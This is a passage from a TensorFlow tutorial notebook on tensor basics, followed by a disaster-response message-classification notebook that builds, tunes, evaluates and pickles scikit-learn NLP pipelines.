# Tensors may have more axes, here is a tensor with 3-axes:
# + colab={} colab_type="code" id="sesW7gw6JkXy"
# There can be an arbitrary number of
# axes (sometimes called "dimensions")
rank_3_tensor = tf.constant([
[[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]],
[[10, 11, 12, 13, 14],
[15, 16, 17, 18, 19]],
[[20, 21, 22, 23, 24],
[25, 26, 27, 28, 29]],])
print(rank_3_tensor)
# + [markdown] colab_type="text" id="rM2sTGIkoE3S"
# There are many ways you might visualize a tensor with more than 2-axes.
# + [markdown] colab_type="text" id="NFiYfNMMhDgL"
# <table>
# <tr>
# <th colspan=3>A 3-axis tensor, shape: <code>[3, 2, 5]</code></th>
# <tr>
# <tr>
# <td>
# <img src="images/tensor/3-axis_numpy.png"/>
# </td>
# <td>
# <img src="images/tensor/3-axis_front.png"/>
# </td>
#
# <td>
# <img src="images/tensor/3-axis_block.png"/>
# </td>
# </tr>
#
# </table>
# + [markdown] colab_type="text" id="oWAc0U8OZwNb"
# You can convert a tensor to a NumPy array either using `np.array` or the `tensor.numpy` method:
# + colab={} colab_type="code" id="J5u6_6ZYaS7B"
np.array(rank_2_tensor)
# + colab={} colab_type="code" id="c6Taz2gIaZeo"
rank_2_tensor.numpy()
# + [markdown] colab_type="text" id="hnz19F0ocEKD"
# Tensors often contain floats and ints, but have many other types, including:
#
# * complex numbers
# * strings
#
# The base `tf.Tensor` class requires tensors to be "rectangular"---that is, along each axis, every element is the same size. However, there are specialized types of Tensors that can handle different shapes:
#
# * ragged (see [RaggedTensor](#ragged_tensors) below)
# * sparse (see [SparseTensor](#sparse_tensors) below)
# + [markdown] colab_type="text" id="SDC7OGeAIJr8"
# We can do basic math on tensors, including addition, element-wise multiplication, and matrix multiplication.
# + colab={} colab_type="code" id="-DTkjwDOIIDa"
a = tf.constant([[1, 2],
[3, 4]])
b = tf.constant([[1, 1],
[1, 1]]) # Could have also said `tf.ones([2,2])`
print(tf.add(a, b), "\n")
print(tf.multiply(a, b), "\n")
print(tf.matmul(a, b), "\n")
# + colab={} colab_type="code" id="2smoWeUz-N2q"
print(a + b, "\n") # element-wise addition
print(a * b, "\n") # element-wise multiplication
print(a @ b, "\n") # matrix multiplication
# + [markdown] colab_type="text" id="S3_vIAl2JPVc"
# Tensors are used in all kinds of operations (ops).
# + colab={} colab_type="code" id="Gp4WUYzGIbnv"
c = tf.constant([[4.0, 5.0], [10.0, 1.0]])
# Find the largest value
print(tf.reduce_max(c))
# Find the index of the largest value
print(tf.argmax(c))
# Compute the softmax
print(tf.nn.softmax(c))
# + [markdown] colab_type="text" id="NvSAbowVVuRr"
# ## About shapes
# + [markdown] colab_type="text" id="hkaBIqkTCcGY"
# Tensors have shapes. Some vocabulary:
#
# * **Shape**: The length (number of elements) of each of the dimensions of a tensor.
# * **Rank**: Number of tensor dimensions. A scalar has rank 0, a vector has rank 1, a matrix is rank 2.
# * **Axis** or **Dimension**: A particular dimension of a tensor.
# * **Size**: The total number of items in the tensor, i.e. the product of the elements of the shape vector
#
# + [markdown] colab_type="text" id="E9L3-kCQq2f6"
# Note: Although you may see reference to a "tensor of two dimensions", a rank-2 tensor does not usually describe a 2D space.
# + [markdown] colab_type="text" id="VFOyG2tn8LhW"
# Tensors and `tf.TensorShape` objects have convenient properties for accessing these:
# + colab={} colab_type="code" id="RyD3yewUKdnK"
rank_4_tensor = tf.zeros([3, 2, 4, 5])
# + [markdown] colab_type="text" id="oTZZW9ziq4og"
# <table>
# <tr>
# <th colspan=2>A rank-4 tensor, shape: <code>[3, 2, 4, 5]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/shape.png" alt="A tensor shape is like a vector.">
# <td>
# <img src="images/tensor/4-axis_block.png" alt="A 4-axis tensor">
# </td>
# </tr>
# </table>
#
# + colab={} colab_type="code" id="MHm9vSqogsBk"
print("Type of every element:", rank_4_tensor.dtype)
print("Number of dimensions:", rank_4_tensor.ndim)
print("Shape of tensor:", rank_4_tensor.shape)
print("Elements along axis 0 of tensor:", rank_4_tensor.shape[0])
print("Elements along the last axis of tensor:", rank_4_tensor.shape[-1])
print("Total number of elements (3*2*4*5): ", tf.size(rank_4_tensor).numpy())
# + [markdown] colab_type="text" id="bQmE_Vx5JilS"
# While axes are often referred to by their indices, you should always keep track of the meaning of each. Often axes are ordered from global to local: The batch axis first, followed by spatial dimensions, and features for each location last. This way feature vectors are contiguous regions of memory.
#
# <table>
# <tr>
# <th>Typical axis order</th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/shape2.png" alt="Keep track of what each axis is. A 4-axis tensor might be: Batch, Width, Height, Freatures">
# </td>
# </tr>
# </table>
# + [markdown] colab_type="text" id="FlPoVvJS75Bb"
# ## Indexing
# + [markdown] colab_type="text" id="apOkCKqCZIZu"
# ### Single-axis indexing
#
# TensorFlow follows standard Python indexing rules, similar to [indexing a list or a string in python](https://docs.python.org/3/tutorial/introduction.html#strings), and the basic rules for NumPy indexing.
#
# * indexes start at `0`
# * negative indices count backwards from the end
# * colons, `:`, are used for slices `start:stop:step`
#
# + colab={} colab_type="code" id="SQ-CrJxLXTIM"
rank_1_tensor = tf.constant([0, 1, 1, 2, 3, 5, 8, 13, 21, 34])
print(rank_1_tensor.numpy())
# + [markdown] colab_type="text" id="mQYYL56PXSak"
# Indexing with a scalar removes the dimension:
# + colab={} colab_type="code" id="n6tqHciOWMt5"
print("First:", rank_1_tensor[0].numpy())
print("Second:", rank_1_tensor[1].numpy())
print("Last:", rank_1_tensor[-1].numpy())
# + [markdown] colab_type="text" id="qJLHU_a2XwpG"
# Indexing with a `:` slice keeps the dimension:
# + colab={} colab_type="code" id="giVPPcfQX-cu"
print("Everything:", rank_1_tensor[:].numpy())
print("Before 4:", rank_1_tensor[:4].numpy())
print("From 4 to the end:", rank_1_tensor[4:].numpy())
print("From 2, before 7:", rank_1_tensor[2:7].numpy())
print("Every other item:", rank_1_tensor[::2].numpy())
print("Reversed:", rank_1_tensor[::-1].numpy())
# + [markdown] colab_type="text" id="elDSxXi7X-Bh"
# ### Multi-axis indexing
# + [markdown] colab_type="text" id="Cgk0uRUYZiai"
# Higher rank tensors are indexed by passing multiple indices.
#
# The exact same rules as in the single-axis case apply to each axis independently.
# + colab={} colab_type="code" id="Tc5X_WlsZXmd"
print(rank_2_tensor.numpy())
# + [markdown] colab_type="text" id="w07U9vq5ipQk"
# Passing an integer for each index, the result is a scalar.
# + colab={} colab_type="code" id="PvILXc1PjqTM"
# Pull out a single value from a 2-rank tensor
print(rank_2_tensor[1, 1].numpy())
# + [markdown] colab_type="text" id="3RLCzAOHjfEH"
# You can index using any combination of integers and slices:
# + colab={} colab_type="code" id="YTqNqsfJkJP_"
# Get row and column tensors
print("Second row:", rank_2_tensor[1, :].numpy())
print("Second column:", rank_2_tensor[:, 1].numpy())
print("Last row:", rank_2_tensor[-1, :].numpy())
print("First item in last column:", rank_2_tensor[0, -1].numpy())
print("Skip the first row:")
print(rank_2_tensor[1:, :].numpy(), "\n")
# + [markdown] colab_type="text" id="P45TwSUVSK6G"
# Here is an example with a 3-axis tensor:
# + colab={} colab_type="code" id="GuLoMoCVSLxK"
print(rank_3_tensor[:, :, 4])
# + [markdown] colab_type="text" id="9NgmHq27TJOE"
# <table>
# <tr>
# <th colspan=2>Selecting the last feature across all locations in each example in the batch </th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/index1.png" alt="A 3x2x5 tensor with all the values at the index-4 of the last axis selected.">
# </td>
# <td>
# <img src="images/tensor/index2.png" alt="The selected values packed into a 2-axis tensor.">
# </td>
# </tr>
# </table>
# + [markdown] colab_type="text" id="fpr7R0t4SVb0"
# ## Manipulating Shapes
#
# Reshaping a tensor is of great utility.
#
# The `tf.reshape` operation is fast and cheap as the underlying data does not need to be duplicated.
#
# + colab={} colab_type="code" id="EMeTtga5Wq8j"
# Shape returns a `TensorShape` object that shows the size on each dimension
var_x = tf.Variable(tf.constant([[1], [2], [3]]))
print(var_x.shape)
# + colab={} colab_type="code" id="38jc2RXziT3W"
# You can convert this object into a Python list, too
print(var_x.shape.as_list())
# + [markdown] colab_type="text" id="J_xRlHZMKYnF"
# You can reshape a tensor into a new shape. Reshaping is fast and cheap as the underlying data does not need to be duplicated.
# + colab={} colab_type="code" id="pa9JCgMLWy87"
# We can reshape a tensor to a new shape.
# Note that we're passing in a list
reshaped = tf.reshape(var_x, [1, 3])
# + colab={} colab_type="code" id="Mcq7iXOkW3LK"
print(var_x.shape)
print(reshaped.shape)
# + [markdown] colab_type="text" id="gIB2tOkoVr6E"
# The data maintains its layout in memory and a new tensor is created, with the requested shape, pointing to the same data. TensorFlow uses C-style "row-major" memory ordering, where incrementing the right-most index corresponds to a single step in memory.
# + colab={} colab_type="code" id="7kMfM0RpUgI8"
print(rank_3_tensor)
# + [markdown] colab_type="text" id="TcDtfQkJWzIx"
# If you flatten a tensor you can see what order it is laid out in memory.
# + colab={} colab_type="code" id="COnHEPuaWDQp"
# A `-1` passed in the `shape` argument says "Whatever fits".
print(tf.reshape(rank_3_tensor, [-1]))
# + [markdown] colab_type="text" id="jJZRira2W--c"
# Typically the only reasonable uses of `tf.reshape` are to combine or split adjacent axes (or add/remove `1`s).
#
# For this 3x2x5 tensor, reshaping to (3x2)x5 or 3x(2x5) are both reasonable things to do, as the slices do not mix:
# + colab={} colab_type="code" id="zP2Iqc7zWu_J"
print(tf.reshape(rank_3_tensor, [3*2, 5]), "\n")
print(tf.reshape(rank_3_tensor, [3, -1]))
# + [markdown] colab_type="text" id="6ZsZRUhihlDB"
# <table>
# <th colspan=3>
# Some good reshapes.
# </th>
# <tr>
# <td>
# <img src="images/tensor/reshape-before.png" alt="A 3x2x5 tensor">
# </td>
# <td>
# <img src="images/tensor/reshape-good1.png" alt="The same data reshaped to (3x2)x5">
# </td>
# <td>
# <img src="images/tensor/reshape-good2.png" alt="The same data reshaped to 3x(2x5)">
# </td>
# </tr>
# </table>
#
# + [markdown] colab_type="text" id="nOcRxDC3jNIU"
# Reshaping will "work" for any new shape with the same total number of elements, but it will not do anything useful if you do not respect the order of the axes.
#
# Swapping axes in `tf.reshape` does not work, you need `tf.transpose` for that.
#
# + colab={} colab_type="code" id="I9qDL_8u7cBH"
# Bad examples: don't do this
# You can't reorder axes with reshape.
print(tf.reshape(rank_3_tensor, [2, 3, 5]), "\n")
# This is a mess
print(tf.reshape(rank_3_tensor, [5, 6]), "\n")
# This doesn't work at all
try:
tf.reshape(rank_3_tensor, [7, -1])
except Exception as e:
print(f"{type(e).__name__}: {e}")
# + [markdown] colab_type="text" id="qTM9-5eh68oo"
# <table>
# <th colspan=3>
# Some bad reshapes.
# </th>
# <tr>
# <td>
# <img src="images/tensor/reshape-bad.png" alt="You can't reorder axes, use tf.transpose for that">
# </td>
# <td>
# <img src="images/tensor/reshape-bad4.png" alt="Anything that mixes the slices of data together is probably wrong.">
# </td>
# <td>
# <img src="images/tensor/reshape-bad2.png" alt="The new shape must fit exactly.">
# </td>
# </tr>
# </table>
# + [markdown] colab_type="text" id="N9r90BvHCbTt"
# You may run across not-fully-specified shapes. Either the shape contains a `None` (a dimension's length is unknown) or the shape is `None` (the rank of the tensor is unknown).
#
# Except for [tf.RaggedTensor](#ragged_tensors), this will only occur in the context of TensorFlow's, symbolic, graph-building APIs:
#
# * [tf.function](function.ipynb)
# * The [keras functional API](keras/functional.ipynb).
#
# + [markdown] colab_type="text" id="fDmFtFM7k0R2"
# ## More on `DTypes`
#
# To inspect a `tf.Tensor`'s data type use the `Tensor.dtype` property.
#
# When creating a `tf.Tensor` from a Python object you may optionally specify the datatype.
#
# If you don't, TensorFlow chooses a datatype that can represent your data. TensorFlow converts Python integers to `tf.int32` and python floating point numbers to `tf.float32`. Otherwise TensorFlow uses the same rules NumPy uses when converting to arrays.
#
# You can cast from type to type.
# + colab={} colab_type="code" id="5mSTDWbelUvu"
the_f64_tensor = tf.constant([2.2, 3.3, 4.4], dtype=tf.float64)
the_f16_tensor = tf.cast(the_f64_tensor, dtype=tf.float16)
# Now, let's cast to an uint8 and lose the decimal precision
the_u8_tensor = tf.cast(the_f16_tensor, dtype=tf.uint8)
print(the_u8_tensor)
# + [markdown] colab_type="text" id="s1yBlJsVlFSu"
# ## Broadcasting
#
# Broadcasting is a concept borrowed from the [equivalent feature in NumPy](https://numpy.org/doc/stable/user/basics.html). In short, under certain conditions, smaller tensors are "stretched" automatically to fit larger tensors when running combined operations on them.
#
# The simplest and most common case is when you attempt to multiply or add a tensor to a scalar. In that case, the scalar is broadcast to be the same shape as the other argument.
# + colab={} colab_type="code" id="P8sypqmagHQN"
x = tf.constant([1, 2, 3])
y = tf.constant(2)
z = tf.constant([2, 2, 2])
# All of these are the same computation
print(tf.multiply(x, 2))
print(x * y)
print(x * z)
# + [markdown] colab_type="text" id="o0SBoR6voWcb"
# Likewise, 1-sized dimensions can be stretched out to match the other arguments. Both arguments can be stretched in the same computation.
#
# In this case a 3x1 matrix is element-wise multiplied by a 1x4 matrix to produce a 3x4 matrix. Note how the leading 1 is optional: The shape of y is `[4]`.
# + colab={} colab_type="code" id="6sGmkPg3XANr"
# These are the same computations
x = tf.reshape(x,[3,1])
y = tf.range(1, 5)
print(x, "\n")
print(y, "\n")
print(tf.multiply(x, y))
# + [markdown] colab_type="text" id="t_7sh-EUYLrE"
# <table>
# <tr>
# <th>A broadcasted add: a <code>[3, 1]</code> times a <code>[1, 4]</code> gives a <code>[3,4]</code> </th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/broadcasting.png" alt="Adding a 3x1 matrix to a 4x1 matrix results in a 3x4 matrix">
# </td>
# </tr>
# </table>
#
# + [markdown] colab_type="text" id="9V3KgSJcKDRz"
# Here is the same operation without broadcasting:
# + colab={} colab_type="code" id="elrF6v63igY8"
x_stretch = tf.constant([[1, 1, 1, 1],
[2, 2, 2, 2],
[3, 3, 3, 3]])
y_stretch = tf.constant([[1, 2, 3, 4],
[1, 2, 3, 4],
[1, 2, 3, 4]])
print(x_stretch * y_stretch) # Again, operator overloading
# + [markdown] colab_type="text" id="14KobqYu85gi"
# Most of the time, broadcasting is both time and space efficient, as the broadcast operation never materializes the expanded tensors in memory.
#
# You can see what broadcasting looks like using `tf.broadcast_to`.
# + colab={} colab_type="code" id="GW2Q59_r8hZ6"
print(tf.broadcast_to(tf.constant([1, 2, 3]), [3, 3]))
# + [markdown] colab_type="text" id="Z2bAMMQY-jpP"
# Unlike a mathematical op, for example, `broadcast_to` does nothing special to save memory. Here, you are materializing the tensor.
#
# It can get even more complicated. [This section](https://jakevdp.github.io/PythonDataScienceHandbook/02.05-computation-on-arrays-broadcasting.html) of Jake VanderPlas's book _Python Data Science Handbook_ shows more broadcasting tricks (again in NumPy).
# + [markdown] colab_type="text" id="o4Rpz0xAsKSI"
# ## tf.convert_to_tensor
#
# Most ops, like `tf.matmul` and `tf.reshape` take arguments of class `tf.Tensor`. However, you'll notice in the above case, we frequently pass Python objects shaped like tensors.
#
# Most, but not all, ops call `convert_to_tensor` on non-tensor arguments. There is a registry of conversions, and most object classes like NumPy's `ndarray`, `TensorShape`, Python lists, and `tf.Variable` will all convert automatically.
#
# See `tf.register_tensor_conversion_function` for more details, and if you have your own type you'd like to automatically convert to a tensor.
# + [markdown] colab_type="text" id="05bBVBVYV0y6"
# ## Ragged Tensors
#
# A tensor with variable numbers of elements along some axis is called "ragged". Use `tf.ragged.RaggedTensor` for ragged data.
#
# For example, This cannot be represented as a regular tensor:
# + [markdown] colab_type="text" id="VPc3jGoeJqB7"
# <table>
# <tr>
# <th>A `tf.RaggedTensor`, shape: <code>[4, None]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/ragged.png" alt="A 2-axis ragged tensor, each row can have a different length.">
# </td>
# </tr>
# </table>
# + colab={} colab_type="code" id="VsbTjoFfNVBF"
ragged_list = [
[0, 1, 2, 3],
[4, 5],
[6, 7, 8],
[9]]
# + colab={} colab_type="code" id="p4xKTo57tutG"
try:
tensor = tf.constant(ragged_list)
except Exception as e:
print(f"{type(e).__name__}: {e}")
# + [markdown] colab_type="text" id="0cm9KuEeMLGI"
# Instead create a `tf.RaggedTensor` using `tf.ragged.constant`:
# + colab={} colab_type="code" id="XhF3QV3jiqTj"
ragged_tensor = tf.ragged.constant(ragged_list)
print(ragged_tensor)
# + [markdown] colab_type="text" id="sFgHduHVNoIE"
# The shape of a `tf.RaggedTensor` contains unknown dimensions:
# + colab={} colab_type="code" id="Eo_3wJUWNgqB"
print(ragged_tensor.shape)
# + [markdown] colab_type="text" id="V9njclVkkN7G"
# ## String tensors
#
# `tf.string` is a `dtype`, which is to say we can represent data as strings (variable-length byte arrays) in tensors.
#
# The strings are atomic and cannot be indexed the way Python strings are. The length of the string is not one of the dimensions of the tensor. See `tf.strings` for functions to manipulate them.
# + [markdown] colab_type="text" id="5P_8spEGQ0wp"
# Here is a scalar string tensor:
# + colab={} colab_type="code" id="sBosmM8MkIh4"
# Tensors can be strings, too here is a scalar string.
scalar_string_tensor = tf.constant("Gray wolf")
print(scalar_string_tensor)
# + [markdown] colab_type="text" id="CMFBSl1FQ3vE"
# And a vector of strings:
# + [markdown] colab_type="text" id="IO-c3Tq3RC1L"
# <table>
# <tr>
# <th>A vector of strings, shape: <code>[3,]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/strings.png" alt="The string length is not one of the tensor's axes.">
# </td>
# </tr>
# </table>
# + colab={} colab_type="code" id="41Dv2kL9QrtO"
# If we have three string tensors of different lengths, this is OK.
tensor_of_strings = tf.constant(["Gray wolf",
"Quick brown fox",
"Lazy dog"])
# Note that the shape is (3,). The string length is not included.
print(tensor_of_strings)
# + [markdown] colab_type="text" id="76gQ9qrgSMzS"
# In the above printout the `b` prefix indicates that `tf.string` dtype is not a unicode string, but a byte-string. See the [Unicode Tutorial](https://www.tensorflow.org/tutorials/load_data/unicode) for more about working with unicode text in TensorFlow.
# -
# If we have three string tensors of different lengths, this is OK.
tensor_of_strings = tf.constant([u"今天天气不错",
"挺风和日丽的",
"我们下午没有课"])
# Note that the shape is (3,). The string length is not included.
print(tensor_of_strings[1:])
tf.print(tensor_of_strings[1])
# + [markdown] colab_type="text" id="ClSBPK-lZBQp"
# If you pass unicode characters they are utf-8 encoded.
# + colab={} colab_type="code" id="GTgL53jxSMd9"
tf.constant("🥳👍")
# + [markdown] colab_type="text" id="Ir9cY42MMAei"
# Some basic functions with strings can be found in `tf.strings`, including `tf.strings.split`.
# + colab={} colab_type="code" id="8k2K0VTFyj8e"
# We can use split to split a string into a set of tensors
print(tf.strings.split(scalar_string_tensor, sep=" "))
# + colab={} colab_type="code" id="zgGAn1dfR-04"
# ...but it turns into a `RaggedTensor` if we split up a tensor of strings,
# as each string might be split into a different number of parts.
print(tf.strings.split(tensor_of_strings))
# + [markdown] colab_type="text" id="HsAn1kPeO84m"
# <table>
# <tr>
# <th>Three strings split, shape: <code>[3, None]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/string-split.png" alt="Splitting multiple strings returns a tf.RaggedTensor">
# </td>
# </tr>
# </table>
# + [markdown] colab_type="text" id="st9OxrUxWSKY"
# And `tf.string.to_number`:
# + colab={} colab_type="code" id="3nRtx3X9WRfN"
text = tf.constant("1 10 100")
print(tf.strings.to_number(tf.strings.split(text, " ")))
# + [markdown] colab_type="text" id="r2EZtBbJBns4"
# Although you can't use `tf.cast` to turn a string tensor into numbers, you can convert it into bytes, and then into numbers.
# + colab={} colab_type="code" id="fo8BjmH7gyTj"
byte_strings = tf.strings.bytes_split(tf.constant("Duck"))
byte_ints = tf.io.decode_raw(tf.constant("Duck"), tf.uint8)
print("Byte strings:", byte_strings)
print("Bytes:", byte_ints)
# + colab={} colab_type="code" id="uSQnZ7d1jCSQ"
# Or split it up as unicode and then decode it
unicode_bytes = tf.constant("アヒル 🦆")
unicode_char_bytes = tf.strings.unicode_split(unicode_bytes, "UTF-8")
unicode_values = tf.strings.unicode_decode(unicode_bytes, "UTF-8")
print("\nUnicode bytes:", unicode_bytes)
print("\nUnicode chars:", unicode_char_bytes)
print("\nUnicode values:", unicode_values)
# + [markdown] colab_type="text" id="fE7nKJ2YW3aY"
# The `tf.string` dtype is used for all raw bytes data in TensorFlow. The `tf.io` module contains functions for converting data to and from bytes, including decoding images and parsing csv.
# + [markdown] colab_type="text" id="ua8BnAzxkRKV"
# ## Sparse tensors
#
# Sometimes, your data is sparse, like a very wide embedding space. TensorFlow supports `tf.sparse.SparseTensor` and related operations to store sparse data efficiently.
# + [markdown] colab_type="text" id="mS5zgqgUTPRb"
# <table>
# <tr>
# <th>A `tf.SparseTensor`, shape: <code>[3, 4]</code></th>
# </tr>
# <tr>
# <td>
# <img src="images/tensor/sparse.png" alt="An 3x4 grid, with values in only two of the cells.">
# </td>
# </tr>
# </table>
# + colab={} colab_type="code" id="B9nbO1E2kSUN"
# Sparse tensors store values by index in a memory-efficient manner
sparse_tensor = tf.sparse.SparseTensor(indices=[[0, 0], [1, 2]],
values=[1, 2],
dense_shape=[3, 4])
print(sparse_tensor, "\n")
# We can convert sparse tensors to dense
print(tf.sparse.to_dense(sparse_tensor))
|
src/Basic_knowledge/learn_TensorFlow2.0/tensor.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # ML Pipeline Preparation
# Follow the instructions below to help you create your ML pipeline.
# ### 1. Import libraries and load data from database.
# - Import Python libraries
# - Load dataset from database with [`read_sql_table`](https://pandas.pydata.org/pandas-docs/stable/generated/pandas.read_sql_table.html)
# - Define feature and target variables X and Y
# import libraries
import pandas as pd
import numpy as np
import pickle
from sqlalchemy import create_engine
import warnings
warnings.filterwarnings("ignore")
# import NLP libraries
import re
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.stem.wordnet import WordNetLemmatizer
# nltk.download('punkt')
# nltk.download('stopwords')
# nltk.download('wordnet') # download for lemmatization
# import sklearn
from sklearn.pipeline import Pipeline
from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.multioutput import MultiOutputClassifier
from sklearn.metrics import precision_score, recall_score, f1_score
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
# load data from database
engine = create_engine('sqlite:///data/DisasterResponse.db')
df = pd.read_sql_table('DisasterResponse', engine)
# Features: raw message text. Targets: every remaining column after dropping
# the identifier/text/metadata columns (the binary category labels).
X = df['message']
Y = df.drop(['id', 'message', 'original', 'genre'], axis=1)
# ### 2. Write a tokenization function to process your text data
def tokenize(text):
    """Normalize, tokenize and lemmatize a raw message string.

    Args:
        text (str): raw message text, possibly containing URLs.

    Returns:
        list of str: lowercased, lemmatized word tokens with every URL
        replaced by the literal token ``urlplaceholder`` and English
        stopwords removed.
    """
    # URL pattern. FIX: the original character class contained a stray
    # space ('[!*\(\), ]'), which let a match swallow whitespace and any
    # text following a URL; the space is removed here.
    url_re = r'http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+'
    # Replace each detected URL with a fixed placeholder token so distinct
    # URLs do not inflate the vocabulary.
    for url in re.findall(url_re, text):
        text = text.replace(url, "urlplaceholder")
    # Tokenize the (URL-free) text into word tokens.
    tokens = word_tokenize(text)
    lemmatizer = WordNetLemmatizer()
    # FIX: lowercase BEFORE lemmatizing — WordNetLemmatizer only reduces
    # lowercase surface forms ("Dogs" -> "Dogs", but "dogs" -> "dog").
    clean_tokens = [lemmatizer.lemmatize(tok.lower().strip()) for tok in tokens]
    # Drop English stopwords; a set gives O(1) membership tests.
    stop_words = set(stopwords.words('english'))
    return [token for token in clean_tokens if token not in stop_words]
# ### 3. Build a machine learning pipeline
# - You'll find the [MultiOutputClassifier](http://scikit-learn.org/stable/modules/generated/sklearn.multioutput.MultiOutputClassifier.html) helpful for predicting multiple target variables.
def build_pipeline():
    """Assemble the baseline NLP classification pipeline.

    Counts word tokens with ``tokenize``, re-weights them with TF-IDF,
    and feeds the result to a multi-output random forest.

    Returns:
        sklearn.pipeline.Pipeline: unfitted pipeline ready for
        ``fit`` / ``predict``.
    """
    # One random forest per target column via MultiOutputClassifier.
    forest = RandomForestClassifier(n_estimators=100, n_jobs=6)
    steps = [
        ('vec', CountVectorizer(tokenizer=tokenize)),
        ('tfidf', TfidfTransformer()),
        ('clf', MultiOutputClassifier(forest)),
    ]
    return Pipeline(steps)
# ### 4. Train pipeline
# - Split data into train and test sets
# - Train pipeline
# Default 75/25 train/test split. NOTE(review): random_state is not fixed,
# so the split — and all downstream scores — vary between runs.
X_train, X_test, y_train, y_test = train_test_split(X, Y)
pipeline = build_pipeline()
# Fitting is expensive: tokenization + a 100-tree forest per target column.
pipeline.fit(X_train, y_train)
# ### 5. Test your model
# Report the f1 score, precision and recall for each output category of the dataset. You can do this by iterating through the columns and calling sklearn's `classification_report` on each.
def build_report(pipeline, X_test, y_test):
    """Score a fitted pipeline on the test set, one row per target column.

    Args:
        pipeline: fitted estimator exposing ``predict``.
        X_test (pd.Series): raw message strings.
        y_test (pd.DataFrame): binary target columns.

    Returns:
        pd.DataFrame: indexed by target column, with columns
        'f1 score', 'precision' and 'recall'.

    NOTE(review): with ``average='micro'`` on a single binary column,
    f1 == precision == recall == accuracy; kept unchanged for
    comparability with earlier results.
    """
    # Predict once for the whole test set.
    y_pred = pipeline.predict(X_test)
    performances = []
    # enumerate() instead of range(len(...)); hoist the repeated .iloc /
    # column-slice expressions so each metric call reuses the same arrays.
    for i, _column in enumerate(y_test.columns):
        true_vals = y_test.iloc[:, i].values
        pred_vals = y_pred[:, i]
        performances.append([
            f1_score(true_vals, pred_vals, average='micro'),
            precision_score(true_vals, pred_vals, average='micro'),
            recall_score(true_vals, pred_vals, average='micro'),
        ])
    return pd.DataFrame(performances,
                        columns=['f1 score', 'precision', 'recall'],
                        index=y_test.columns)
# Evaluate the baseline random-forest pipeline on the held-out set.
build_report(pipeline, X_test, y_test)
# ### 6. Improve your model
# Use grid search to find better parameters.
# +
# Grid over per-split feature sampling and forest size, 5-fold CV.
parameters = {'clf__estimator__max_features':['sqrt', 0.5],
              'clf__estimator__n_estimators':[50, 100]}
cv = GridSearchCV(estimator=pipeline, param_grid = parameters, cv = 5, n_jobs = 6)
# NOTE(review): refits the full NLP pipeline for every candidate x fold
# (4 x 5 = 20 fits) — this cell is very slow.
cv.fit(X_train, y_train)
# -
# ### 7. Test your model
# Show the accuracy, precision, and recall of the tuned model.
#
# Since this project focuses on code quality, process, and pipelines, there is no minimum performance metric needed to pass. However, make sure to fine tune your models for accuracy, precision and recall to make your project stand out - especially for your portfolio!
# Score the tuned model (GridSearchCV predicts with its refitted best estimator).
build_report(cv, X_test, y_test)
# Best hyper-parameter combination found by the grid search.
cv.best_params_
# ### 8. Try improving your model further. Here are a few ideas:
# * try other machine learning algorithms
# * add other features besides the TF-IDF
# AdaBoost variant of the same vectorize -> tf-idf -> classify pipeline.
pipeline_improved = Pipeline([
    ('vect', CountVectorizer(tokenizer=tokenize)),
    ('tfidf', TfidfTransformer()),
    ('clf', MultiOutputClassifier(AdaBoostClassifier(n_estimators = 100)))
])
pipeline_improved.fit(X_train, y_train)
# NOTE(review): y_pred_improved is never used below — build_report
# recomputes predictions internally, so this line doubles the predict cost.
y_pred_improved = pipeline_improved.predict(X_test)
build_report(pipeline_improved, X_test, y_test)
# ### 9. Export your model as a pickle file
# Persist both fitted models so train.py / the web app can load them.
# FIX: the originals passed bare open() handles to pickle.dump and never
# closed them; context managers flush and close the files deterministically.
with open('rf_model.pkl', 'wb') as model_file:
    pickle.dump(pipeline, model_file)
with open('adaboost_model.pkl', 'wb') as model_file:
    pickle.dump(pipeline_improved, model_file)
# ### 10. Use this notebook to complete `train.py`
# Use the template file attached in the Resources folder to write a script that runs the steps above to create a database and export a model based on a new dataset specified by the user.
|
Project 5 - Disaster Response Pipeline/ML Pipeline Preparation.ipynb
|